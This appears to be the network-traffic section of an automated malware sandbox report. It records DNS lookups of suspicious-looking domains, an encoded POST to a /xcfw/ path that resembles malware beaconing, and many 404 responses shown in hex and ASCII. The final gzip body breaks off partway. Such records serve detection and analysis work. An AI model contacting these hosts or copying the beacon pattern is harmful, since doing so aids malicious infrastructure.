            Source: global trafficDNS traffic detected: DNS query: www.mizuquan.top
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: unknownHTTP traffic detected: POST /xcfw/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enHost: www.freepicture.onlineOrigin: http://www.freepicture.onlineReferer: http://www.freepicture.online/xcfw/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 203Cache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 6e 52 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 4b 54 4e 6f 51 52 43 72 45 71 4f 72 64 68 6e 39 6a 56 52 37 71 69 76 42 79 66 38 43 37 72 65 76 76 57 46 70 32 38 3d Data Ascii: nR=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNoQRCrEqOrdhn9jVR7qivByf8C7revvWFp28=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:02:39 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 11:02:55 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 11:02:57 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 11:03:00 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 11:03:03 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:03:17 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:03:19 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:03:22 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:03:24 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 12 Sep 2024 11:03:38 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-12T11:03:43.4315597Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 11:03:57 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 11:04:00 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 11:04:02 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 11:04:05 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:04:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 